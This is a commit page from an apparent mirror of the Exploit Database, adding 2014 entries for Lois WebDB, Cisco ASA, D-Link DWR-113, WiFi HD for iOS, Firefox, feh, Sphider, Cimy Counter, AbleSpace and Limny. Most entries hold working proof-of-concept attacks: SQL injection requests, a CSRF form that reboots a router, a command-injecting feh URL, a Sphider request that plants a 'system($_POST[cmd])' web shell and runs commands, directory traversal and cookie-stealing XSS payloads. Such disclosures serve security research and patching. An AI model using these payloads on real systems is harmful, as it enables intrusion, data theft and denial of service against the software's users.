bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_31_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-31 04:40:32 +00:00
parent 3bea4b7d56
commit 3782948984
11 changed files with 659 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -30793,5 +30793,15 @@ id,file,description,date,author,platform,type,port
34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0
34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0
34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability",2014-07-28,"Seth Art",hardware,webapps,80
34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80
34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80
34191,platforms/php/remote/34191.py,"Oxwall 1.7.0 - Remote Code Execution Exploit",2014-07-28,LiquidWorm,php,remote,80
34192,platforms/linux/remote/34192.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow Vulnerability",2010-06-22,"Martin Barbella",linux,remote,0
34194,platforms/asp/webapps/34194.txt,"Lois Software WebDB 2.0A Script Multiple SQL Injection Vulnerabilities",2010-06-24,"High-Tech Bridge SA",asp,webapps,0
34195,platforms/php/webapps/34195.txt,"Cimy Counter for WordPress 0.9.4 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2010-05-05,MustLive,php,webapps,0
34196,platforms/ios/webapps/34196.txt,"WiFi HD v7.3.0 iOS - Multiple Vulnerabilities",2014-07-29,Vulnerability-Lab,ios,webapps,0
34197,platforms/php/webapps/34197.txt,"AbleSpace 1.0 'news.php' SQL Injection Vulnerability",2010-06-25,JaMbA,php,webapps,0
34198,platforms/php/webapps/34198.txt,"Limny 2.1 'q' Parameter Cross Site Scripting Vulnerability",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting Vulnerability",2010-06-25,"Daniel King",hardware,remote,0
34201,platforms/linux/remote/34201.txt,"feh <= 1.7 '--wget-timestamp' Remote Code Execution Vulnerability",2010-06-25,anonymous,linux,remote,0
34203,platforms/hardware/webapps/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,webapps,0

Can't render this file because it is too large.

18
platforms/asp/webapps/34194.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/41124/info
Lois Software WebDB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Lois Software WebDB 2.0a is vulnerable; other versions may also be affected.
<form action="http://host/loisweb/index.asp?topic=./links/search" method="POST" >
<input type="hidden" name="qs" value="847" >
<input type="hidden" name="Search0" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search1" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search2" value="' ANY_SQL_HERE" >
<input type="hidden" name="Search3" value="' ANY_SQL_HERE" >
<input type=submit>
</form>
http://www.example.com/loisweb/index.asp?topic=./links/results&resultstype=1&qs=396&qt=+qaq++[5]+%3D+%27%27+ANY_SQL_HERE

11
platforms/hardware/remote/34200.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41159/info
Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust.
Firmware versions prior to Cisco ASA 8.1(2) are vulnerable.
This issue is being tracked by Cisco Bugid CSCsr09163.
URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125

112
platforms/hardware/webapps/34203.txt Executable file
View file

@ -0,0 +1,112 @@
Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 29/07/14
Vendor Homepage : http://www.dlink.com/
Software Link : N/A
Firmware version: v2.02 2013-03-13
Tested on : Windows 7
CVE : CVE-2014-3136
Type of Application : Web application
Release mode : Coordinated disclosure
Vulnerability description:
It was observed that the D-link DWR-113 wireless router is vulnerable to
denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability.
An attacker could craft a malicious CSRF exploit to change the password in
the password functionality when the user(admin) is logged in to the
application ,as the user interface (admin panel) lacks the csrf token or
nonce to prevent an attacker to change the password.
As a result, as soon as the crafted malicious exploit is executed the
router is rebooted and the user could not login thus forcing to reset the
routers device physically ,leading to a denial of service condition.
POC code (exploit) :
*Restart Router by CSRF*
<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.0.1/rebo.htm">
<input type="hidden" name="S00010002" value="test" />
<input type="hidden" name="np2" value="test" />
<input type="hidden" name="N00150004" value="0" />
<input type="hidden" name="N00150001" value="" />
<input type="hidden" name="N00150003" value="1080" />
<input type="hidden" name="_cce" value="0x80150002" />
<input type="hidden" name="_sce" value="%Ssc" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Tools used :
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5
Timeline :
06-04-14 : Contacted Vendor with details of Vulnerability and Exploit.
06-04-14 : Vendor D-Link forwards to R&D team for review
29-04-14 : Vendor contacted to know the status.
01-05-14 : Vendor acknowledged and released a patch
01-05-14 : CVE ID provided by Mitre team.
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034

380
platforms/ios/webapps/34196.txt Executable file
View file

@ -0,0 +1,380 @@
Document Title:
===============
WiFi HD v7.3.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1283
Release Date:
=============
2014-07-29
Vulnerability Laboratory ID (VL-ID):
====================================
1283
Common Vulnerability Scoring System:
====================================
7.4
Product & Service Introduction:
===============================
Turn your iPhone into a wireless, mobile external hard drive! Works over any WiFi connection. You can now share, copy, and backup your
files to and from your PC / Mac / Linux / or another phone! Very easy to use. No other software necessary! This is a simple, one stop,
stand alone File Sharing solution.
(Copy of the Homepage: https://itunes.apple.com/us/app/wifi-hd/id310425060 )
Abstract Advisory Information:
==============================
The Vulnerbaility Laboratory Research Team discovered multiple vulnerabilities in the official WiFI HD v7.3 iOS mobile web application.
Vulnerability Disclosure Timeline:
==================================
2014-07-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Savy Soda
Product: WiFI HD - iOS Mobile Web Application 7.3
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Savy Soda - WiFI HD v7.3.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` (submit file) module. Remote attackers are able to inject
own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file/folder list context next to the vulnerable filename value. The attacker is able
to inject the local file request by usage of the available `wifi interface` for file exchange/share.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.9. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi HD v7.3.0
Vulnerable Module(s):
[+] Upload > Submit
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost/)
1.2
A directory traversal web vulnerability has been discovered in the official Savy Soda - WiFI HD v7.3.0 iOS mobile web-application.
The issue allows remote attackers to include own path directory values to unauthorized request a system/device path or file.
The issue is located in the `Create New Folder` function with the vulnerable `Enter folder name` input. Attackers are able to include
own local path requests to compromise the application path itself or to unauthorized request local device files. The attack vector of
the issue is on the application-side and the request method to implement is POST. The application-side execution occurs on top of the
index next to the path directory listing of /home.
The security risk of the directory traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.4. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the path traversal web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi HD v7.3.0
Vulnerable Module(s):
[+] Create New Folder
Vulnerable Input(s):
[+] Enter folder name
Affected Module(s):
[+] Index Path Dir Listing on top (http://localhost/)
1.3
A local command/path injection web vulnerabilities has been discovered in the official Savy Soda - WiFI HD v7.3.0 iOS mobile web-application.
The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `devicename` value of the `File Dir Index` module. Local attackers are able to inject own
malicious system specific commands or path value requests in the vulnerable `devicename` value. The execution of the local command inject
occurs in the `File Dir Index` module of the wifi hd v7.3.0 mobile application. The attacker is able to manipulate the settings module of the
application by preparing to change the local devicename. The encoding of the vulnerable values in the index module is broken and allows an
attacker to inject own commands successfully.
The attack vector is located on the application-side and the injection requires physical device access or a local low privileged user account.
Local attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
types of malicious attack requests.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.2.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Application Header
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index File Dir Listing - Index Header
1.4
A cross site request forgery web vulnerability has been discovered in the official Savy Soda - WiFI HD v7.3.0 iOS mobile web-application.
The issue allows to execute own script codes through application functions by client-side manipulated cross site requests in interaction
with a not expired user session.
The issue is located in the `delete` function of the mobile web-application. The delete function has no restriction and uses only a not
secure GET method request. Attackers can prepare a website with speical crafted links to force an user to delete all the files in the
exchange directory service. The attack vector of the issue is on the client-side and the request method to execute is GET.
The security risk of the cross site request forgery vulnerability is estimated as low with a cvss (common vulnerability scoring system) count of 1.9.
Exploitation of the client-side vulnerability requires no privileged iOS device account but medium or high user interaction. Successful exploitation
of the vulnerability results in the delete of all files in the mobile application service.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] DEL!
Affected Module(s):
[+] Index File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: (Current Directory: Home/) < Upload File > Submit
<a href="<iframe src=a>.png"><./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]">.png</a></td>
<td>[<a href="!DEL!./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png">X</a>] </td>
<td align=right>0.5 Kb</td> </tr><tr><td><a href="asdasd-+%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]%3E/</a></td>
<td>[<a href="!DEL!asdasd-+%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]%3E/">X</a>] </td><td align=right> </td> </tr>
<tr><td colspan=3><hr></td></tr><tr><form action="" method="post" enctype="multipart/form-data"
name="form1" id="form1"></tr><tr><td><label>Select a file to upload: <input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></td></tr></form><tr><td
colspan=4><hr></td></tr><tr><form action="" method="post" name="form2" id="form2"><td>Enter folder name: <input type="text"
name="foldername" id="foldername" /><input type="submit" name="button" id="button"
value="Create Folder" /></td></form></tr></table></body></html></iframe></a>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2080] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------24623207791791
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png
1.2
The directory traversal web vulnerability can be exploited by local attackers in the wifi without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Enter Folder Name > Create New Folder (Current Directory: http://localhost/../../../var/mobile/x)
Status: 200[OK]
POST http://localhost/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1926] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
POST-Daten:
foldername[..%2F..%2F..%2Fvar%2Fmobile%2Fx]
button[Create+Folder]
Response Header:
Accept-Ranges[bytes]
Content-Length[1926]
Date[Mo.,
28 Juli 2014 12:33:06 GMT]
1.3
The local command inject web vulnerability can be exploited by local attackers with physical device access and restricted user account without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the mobile application v7.3.0 to your iOS device (https://itunes.apple.com/us/app/wifi-hd/id310425060)
2. Activate the wifi in your iOS device
3. Setup a new iOS devicename through the options in the settings > info module
4. Include as new devicename your local command to inject on application-side
5. Open another iOS device and surf to the localhost url
6. The via devicename values injected command executes in the header location were the device information becomes visible
7. Successful reproduce of the local command inject vulnerability in the iOS application!
PoC: Index (http://localhost/)
<h1>Files on iPhone: bkm337<[LOCAL COMMAND INJECT VULNERABILITY!]"></h1></td></tr>
<tr><td>The following files are hosted live from the iPhone's Docs folder.</td></tr><tr><td colspan=3><hr></td>
1.4
The client-side cross site request forgery vulnerability can be exploited by remote attackers without privileged application user account and medium or
high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<html>
<head><body>
<title>CSRF DELETE FOLDERS - PoC</title>
<iframe src=http://localhost:8080/!DEL!1/>
<iframe src=http://localhost:8080/!DEL!2/>
<iframe src=http://localhost:8080/!DEL!3/>
<iframe src=http://localhost:8080/!DEL!4/>
<iframe src=http://localhost:8080/!DEL!5/>
<iframe src=http://localhost:8080/!DEL!6/>
</body></head>
<html>
... or
<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3ECSRF%20DELETE%20FOLDERS%20-%20PoC%3C/title%3E%0A
%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%211/%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%212/%3E%0A
%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%213/%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%214/%3E%0A
%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%215/%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A8080/%21DEL%216/%3E%0A
%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse of the filename value in the submit to upload function of the wifi service.
Encode also the filename output listing to prevent further file include attacks via upload.
1.2
The directory traversal can be patched by a special restriction in the requested path value of the web-server. Especially when processing to
request the home/path value or by creating a new folder.
Restrict the input and disallow script code tags as chars, double quotes and slash to prevent the attack.
1.3
The local command inject web vulnerability can be patched by a secure parse and encode of the vulnerable device name information.
Restrict the devicename output and filter wrong inputs to prevent further command injection attacks.
1.4
The cross site request forgery issue can be patched by a secure restriction of the DEL! value.
Setup access roles to ensure that an user account can not delete all directory items.
Security Risk:
==============
1.1
The security risk of the local file include vulnerability in the upload > submit function is estimated as high.
1.2
The security risk of the directory traversal web vulnerability in the path&directory listing is estimated as high.
1.3
The security risk of the local command inject web vulnerability is estimated as high(-).
1.4
The security risk of the client-side cross site request forgery vulnerability is estimated as low(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

16
platforms/linux/remote/34192.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/41082/info
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will likely result in denial-of-service conditions.
These issues are fixed in:
Firefox 3.6.4
Firefox 3.5.10
Thunderbird 3.0.5
SeaMonkey 2.0.5
NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it.
http://www.exploit-db.com/sploits/34192.zip

7
platforms/linux/remote/34201.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41161/info
feh is prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer.
feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'

74
platforms/php/webapps/34189.txt Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: Sphider 1.3.6 or later SQL Injection
# Google Dork: intitle:"Sphider Admin Login"
# Date: 1 July 2014
# Exploit Author: Mike Manzotti
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v 1.3.6
Description:
The web application is vulnerable to SQLi. Once a website has been indexed with Sphider, an attacker can inject SQL under Sites -> Browser pages-> filter option.
Proof of Concept:
Response: POST: /admin/admin.php
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
Response:
<tr class="grey">
<td><a href="5.5.35-0+wheezy1">5.5.35-0+wheezy1</a></td>
<td width="8%">
[cid:image001.jpg@01CFAA73.0B6B8330]
# Exploit Title: Sphider 1.3.6 or later PHP Injection
Description:
An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666.
Proof of Concept:
Request: POST /admin/admin.php
f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5
"system($_POST[cmd])" has been injected.
Request: POST http://URL/sphider/settings/conf.php
cmd=pwd
Response:
/var/www/sphider/settings
# Exploit Title: Sphider 1.3.6 or later Stored and Reflected XSS
Description:
The web application is prone to Stored and Reflected Cross site scripting.
Stored XSS:
Request: POST /admin/admin.php
f=7&parent=&category=<script>alert(document.cookie)</script>
Response
<a href="admin.php?f=edit_cat&cat_id=1">
<script>alert(document.cookie)
</script>
</a>
Reflected XSS:
Request: POST /sphider/admin/admin.php
f=index&adv=1&url="/><script>alert(document.cookie)</script>
Response:
<a href="admin.php?f=edit_cat&cat_id=1">
<script>alert(document.cookie)
</script>
</a>
Solution:
Currently none. The author has been informed.
Timeline:
1 July 2014: The author has been informed
28 July 2014: Vulnerability published

13
platforms/php/webapps/34195.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/41132/info
Cimy Counter for WordPress is prone to an HTTP response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
Versions prior to Cimy Counter for WordPress 0.9.5 are vulnerable.
The following example URIs are available:
http://www.example.com/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
http://www.example.com/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test

9
platforms/php/webapps/34197.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41139/info
AbleSpace is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AbleSpace 1.0 is vulnerable; other versions may be affected as well.
http://www.example.com/path/news.php?view=3(SQL)

9
platforms/php/webapps/34198.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41152/info
Limny is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Limny versions prior to 2.2 are vulnerable.
http://www.example.com/?q=user%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E